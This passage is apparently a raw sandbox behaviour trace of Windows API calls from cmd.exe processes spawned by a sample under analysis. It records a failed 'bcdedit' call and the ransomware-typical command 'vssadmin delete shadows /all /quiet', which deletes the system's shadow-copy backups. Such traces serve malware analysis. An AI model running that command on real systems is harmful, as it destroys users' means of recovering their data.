hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a60 | out: hHeap=0x5d0000) returned 1 [0085.838] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0085.838] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0085.838] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0085.838] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0085.838] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0085.839] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0085.839] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0085.839] GetProcessHeap () returned 0x5d0000 [0085.839] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x58) returned 0x5e3050 [0085.839] GetProcessHeap () returned 0x5d0000 [0085.839] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x18) returned 0x5e30b0 [0085.840] GetProcessHeap () returned 0x5d0000 [0085.841] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6e) returned 0x5e30d0 [0085.842] GetConsoleTitleW (in: lpConsoleTitle=0x1cf428, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0085.843] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0085.843] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0085.843] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0085.843] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0085.843] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0085.843] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0085.843] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0085.843] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0085.843] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0085.843] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0085.843] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0085.843] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0085.843] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0085.843] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0085.843] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0085.843] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0085.843] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0085.843] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0085.843] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0085.844] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0085.844] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0085.844] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0085.844] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0085.844] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0085.844] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0085.844] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0085.844] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0085.844] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0085.844] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0085.844] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0085.844] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0085.844] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0085.844] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0085.844] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0085.844] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0085.844] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0085.844] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0085.844] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0085.844] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0085.844] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0085.844] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0085.844] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0085.845] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0085.845] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0085.845] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0085.845] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0085.845] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0085.845] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0085.845] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0085.845] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0085.845] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0085.845] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0085.845] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0085.845] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0085.845] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0085.845] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0085.845] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0085.845] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0085.845] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0085.845] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0085.845] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0085.845] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0085.845] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0085.845] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0085.845] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0085.846] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0085.846] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0085.846] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0085.846] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0085.846] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0085.846] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0085.846] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0085.846] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0085.846] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0085.846] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0085.846] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0085.846] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0085.846] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0085.846] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0085.846] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0085.846] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0085.846] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0085.846] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0085.846] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0085.846] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0085.846] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0085.846] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0085.847] GetProcessHeap () returned 0x5d0000 [0085.847] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e3148 [0085.847] GetProcessHeap () returned 0x5d0000 [0085.847] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7e) returned 0x5e3360 [0085.847] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0085.847] GetProcessHeap () returned 0x5d0000 [0085.847] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x418) returned 0x5d07f0 [0085.847] SetErrorMode (uMode=0x0) returned 0x0 [0085.848] SetErrorMode (uMode=0x1) returned 0x0 [0085.848] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5d07f8, lpFilePart=0x1cef48 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cef48*="Desktop") returned 0x25 [0085.848] SetErrorMode (uMode=0x0) returned 0x1 [0085.848] GetProcessHeap () returned 0x5d0000 [0085.848] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d07f0, Size=0x64) returned 0x5d07f0 [0085.848] GetProcessHeap () returned 0x5d0000 [0085.848] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d07f0) returned 0x64 [0085.848] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0085.848] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0085.848] GetProcessHeap () returned 0x5d0000 [0085.848] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x120) returned 0x5e33e8 [0085.848] GetProcessHeap () returned 0x5d0000 [0085.848] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x238) returned 0x5d0860 [0085.966] GetProcessHeap () returned 0x5d0000 [0085.966] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5d0860, Size=0x122) returned 0x5d0860 [0085.966] GetProcessHeap () returned 0x5d0000 [0085.966] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5d0860) returned 0x122 [0085.966] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0085.966] GetProcessHeap () returned 0x5d0000 [0085.966] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe0) returned 0x5e3510 [0085.967] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e3510, Size=0x76) returned 0x5e3510 [0085.967] GetProcessHeap () returned 0x5d0000 [0085.967] RtlSizeHeap (HeapHandle=0x5d0000, Flags=0x0, MemoryPointer=0x5e3510) returned 0x76 [0085.968] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.969] GetLastError () returned 0x2 [0085.969] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.969] GetLastError () returned 0x2 [0085.969] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.969] GetLastError () returned 0x2 [0085.969] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.970] GetLastError () returned 0x2 [0085.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.970] GetLastError () returned 0x2 [0085.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.970] GetLastError () returned 0x2 [0085.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.971] GetLastError () returned 0x2 [0085.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.971] GetLastError () returned 0x2 [0085.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.973] GetLastError () returned 0x2 [0085.973] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1cecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cecc4) returned 0xffffffff [0085.976] GetLastError () returned 0x2 [0085.976] _get_osfhandle (_FileHandle=2) returned 0xb [0085.977] GetFileType (hFile=0xb) returned 0x2 [0085.977] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0085.977] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf118 | out: lpMode=0x1cf118) returned 1 [0085.978] _get_osfhandle (_FileHandle=2) returned 0xb [0085.978] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1cf14c | out: lpConsoleScreenBufferInfo=0x1cf14c) returned 1 [0085.978] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0085.979] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49eb4640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x1cf170, lpReserved=0x0 | out: lpBuffer=0x49eb4640*, lpNumberOfCharsWritten=0x1cf170*=0x62) returned 1 [0085.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0085.980] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0085.980] _get_osfhandle (_FileHandle=1) returned 0x7 [0085.980] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0085.980] _get_osfhandle (_FileHandle=0) returned 0x3 [0085.981] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0085.981] SetConsoleInputExeNameW () returned 0x1 [0085.981] GetConsoleOutputCP () returned 0x1b5 [0085.981] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0085.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0085.982] exit (_Code=1) Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3a305000" os_pid = "0xb1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "cmd.exe /c vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 117 os_tid = 0x544 [0092.821] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fd5c | out: lpSystemTimeAsFileTime=0x16fd5c*(dwLowDateTime=0x2535ebc0, dwHighDateTime=0x1d62227)) [0092.821] GetCurrentProcessId () returned 0xb1c [0092.821] GetCurrentThreadId () returned 0x544 [0092.821] GetTickCount () returned 0x114e051 [0092.821] QueryPerformanceCounter (in: lpPerformanceCount=0x16fd54 | out: lpPerformanceCount=0x16fd54*=21277626507) returned 1 [0092.823] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0092.823] __set_app_type (_Type=0x1) [0092.823] __p__fmode () returned 0x770331f4 [0092.823] __p__commode () returned 0x770331fc [0092.823] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0092.823] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0092.824] GetCurrentThreadId () returned 0x544 [0092.824] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x544) returned 0x60 [0092.824] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0092.824] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0092.824] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.825] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0092.825] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fcec | out: phkResult=0x16fcec*=0x0) returned 0x2 [0092.826] VirtualQuery (in: lpAddress=0x16fd23, lpBuffer=0x16fcbc, dwLength=0x1c | out: lpBuffer=0x16fcbc*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.826] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fcbc, dwLength=0x1c | out: lpBuffer=0x16fcbc*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0092.826] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fcbc, dwLength=0x1c | out: lpBuffer=0x16fcbc*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0092.826] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fcbc, dwLength=0x1c | out: lpBuffer=0x16fcbc*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.826] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fcbc, dwLength=0x1c | out: lpBuffer=0x16fcbc*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x39000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0092.826] GetConsoleOutputCP () returned 0x1b5 [0092.826] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0092.827] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0092.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0092.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.828] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0092.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.829] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.829] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0092.830] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.830] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0092.830] GetEnvironmentStringsW () returned 0x5c2018* [0092.830] GetProcessHeap () returned 0x5b0000 [0092.830] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xaca) returned 0x5c2af0 [0092.831] FreeEnvironmentStringsW (penv=0x5c2018) returned 1 [0092.831] GetProcessHeap () returned 0x5b0000 [0092.831] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4) returned 0x5c0c50 [0092.831] GetEnvironmentStringsW () returned 0x5c2018* [0092.831] GetProcessHeap () returned 0x5b0000 [0092.831] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xaca) returned 0x5c35c8 [0092.831] FreeEnvironmentStringsW (penv=0x5c2018) returned 1 [0092.831] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ec5c | out: phkResult=0x16ec5c*=0x68) returned 0x0 [0092.832] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x0, lpData=0x16ec68*=0x0, lpcbData=0x16ec60*=0x1000) returned 0x2 [0092.832] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x1, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.832] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x0, lpData=0x16ec68*=0x1, lpcbData=0x16ec60*=0x1000) returned 0x2 [0092.832] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x0, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.832] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x40, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.832] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x40, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.832] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x0, lpData=0x16ec68*=0x40, lpcbData=0x16ec60*=0x1000) returned 0x2 [0092.832] RegCloseKey (hKey=0x68) returned 0x0 [0092.832] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ec5c | out: phkResult=0x16ec5c*=0x68) returned 0x0 [0092.833] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x0, lpData=0x16ec68*=0x40, lpcbData=0x16ec60*=0x1000) returned 0x2 [0092.833] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x1, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.833] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x0, lpData=0x16ec68*=0x1, lpcbData=0x16ec60*=0x1000) returned 0x2 [0092.833] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x0, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.833] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x9, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.833] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x4, lpData=0x16ec68*=0x9, lpcbData=0x16ec60*=0x4) returned 0x0 [0092.833] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ec64, lpData=0x16ec68, lpcbData=0x16ec60*=0x1000 | out: lpType=0x16ec64*=0x0, lpData=0x16ec68*=0x9, lpcbData=0x16ec60*=0x1000) returned 0x2 [0092.833] RegCloseKey (hKey=0x68) returned 0x0 [0092.833] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb03211 [0092.833] srand (_Seed=0x5eb03211) [0092.833] GetCommandLineW () returned="cmd.exe /c vssadmin delete shadows /all /quiet" [0092.833] GetCommandLineW () returned="cmd.exe /c vssadmin delete shadows /all /quiet" [0092.834] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.834] GetProcessHeap () returned 0x5b0000 [0092.834] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5c2018 [0092.834] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5c2020, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0092.835] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0092.835] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0092.835] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0092.835] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0092.835] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0092.835] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0092.835] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0092.835] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0092.835] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0092.835] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0092.835] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0092.835] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0092.835] GetProcessHeap () returned 0x5b0000 [0092.835] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c2af0 | out: hHeap=0x5b0000) returned 1 [0092.835] GetEnvironmentStringsW () returned 0x5c2230* [0092.835] GetProcessHeap () returned 0x5b0000 [0092.836] RtlAllocateHeap 